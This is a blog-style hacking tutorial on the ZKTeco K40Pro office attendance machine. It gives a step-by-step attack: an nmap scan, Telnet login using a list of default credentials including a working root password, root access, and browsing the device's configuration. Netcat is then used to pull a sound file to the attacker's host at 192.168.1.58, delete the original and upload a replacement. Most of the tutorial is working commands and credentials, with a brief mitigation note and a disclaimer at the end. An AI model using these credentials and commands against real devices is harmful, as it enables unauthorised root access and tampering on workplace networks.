Hacking ZKTeco K40Pro (ZEM510) IoT Device

Hello Friends,

What is the very first thought that comes to your mind when you see  an Attendance Machine ??

Whether you are a student or a professional, the very first thought is Why Why me God… Was there even a need for the so called Office Attendance Machines…??!! The one thing which follows us like our shadow is not our soul mate, twin flame and all but this Attendance machine… Chillax!! IoT devices can be hacked in minutes. Today we are going to hack into one such device – ZKTeco Office Attendance Machine…

Welcome to the realm of Hacking… The future of the hacking lies in IoT hacking. Just as the internet connects people, the Internet of Things connects devices and help them communicate.

Today, We will gain access and change the normal behaviour of this Attendance machine.

IoT Hacking -ZKTeco Office Attendance Machine by Dhaiwat under guidance of Smit Sir

So, Let’s find out whether this “Smart” device is actually smart or not..? 😉 In just ten simple steps Yes…!! You heard it right, In just ten steps we will hack into the system and smartness of the device would be at crucnh.. 😀

The first step is to scan the network and find IP of the device. For this, you can use nmap or Zenmap.

Here  we are using nmap. The attacker IP is 192.168.1.58 and the victims IP is 192.168.1.101.

Now we will do port scanning on victims IP. Port scanning is a technique through which we can find the open ports and target the victim.

Command: Nmap –sV –p- 192.168.1.101 (victims IP)

From the above command, we fetched the output wherein we found that Telnet port is open.

i.e Port no: 23

Telnet Port is open. i.e Port no. 23

In the second step, we will try to connect using default passwords.

Connecting to Telnet using default passwords.

Here is a list of Telnet Default passwords.. 😉

admin:admin

888:manage

manage:888

manage:888

asp:test

888:asp

One of  the combinations which worked for us is root:solokey.

The third step is to check for privileges.

Command to check current user: id

The output of the above command is root.

Checking privileges of user.

Now, in fourth step we will check for running processes to find the process useful for us.

Command ps is used to find running processes.

Here, we found the running processes.

Through this, we found an unusual process. /mnt/mtdblock/main

Fifth step is to get into /mnt/mtdblock

We found the different configuration files.

In /mnt/mdtblock, We found options.cfg which looks like configuration file. What are we waiting for..?? Lets dig into it.

Command: cat file_name. Here options.cfg

Sixth step is to dig into configuration file.

Options.cfg file is important for us.

Here we found some public IPs, ports and user configurations.

Its time to play.

Command: cd wav

ls

In seventh step, we found the wav sound file. This will help us further in changing the behaviour of the smart machine

Number of wav files fetched.

Now through netcat, we will transfer the E_0.wav file.

To do that we started a netcat listener on port 4444 on attackers system, we need to store out put of the command in E_0.wav because when we transfer file via netcat, it only transfers data in raw form.

Here, is the wav file which we got from victim’s system. The monotonous sound of “Thank You” … :((

Command: ncat –lvnp 4444 > E_0.wav

The wav file which we will change is fetched.

Let’s get rid of this boring “Thank You” sound.. Let’s play with the machine..!!! 😉

Now in eight step, we will send the file from victim machine to the attackers system. To do that, use following command on victim system and we will specify E_0.wav file as an input.

Nc 192.168.1.58 4444 < E_0.wav

The file is fetched in attacker’s machine from victim’s machine.

Now, we fetched the file on attackers system. we will use dir command to check filesize.

The size of the file is fetched.

So, now we will generate custom wav file.. 😉

In step number nine, we will generate custom wav file.For that we will use free online website to generate wav file from text and then, rename it to E_0.wav. Lets remove the original file from victim machine using rm command. Now we will start netcat listener on victim machine on port 4444. Now we will save the output of listener in wav file.

Command: nc –lp  4444> E_0.wav

The tenth and the final step is to send our new E_0.wav to victim machine using following command.

Ncat 192.168.1.101 4444  < E_0.wav

The custom wav file is now hosted on victim’s machine.

And bingo, we have changed  the sound of the Attendance machine.

Impact of the IoT device hacking

  • In this case, we are directly getting access of root, meaning we can take full control over it.
  • If the attacker reaches router’s IP through this so called smart device like cameras, attendance machine, Smart Television, he can easily gain credentials of router through rainbow table tool.
  • Once, the attacker has access to router, whole network is under the attacker’s control.

Solution to keep intruders away

  • If you are using the same device at your school, university or work place, the solution to keep away from hackers/attackers is to change the default password of telnet.

Note: “This is for educational purpose only”. The exploiting use of this can land you in legal troubles. Always choose to learn and help other’s rather than landing in any kind of felony.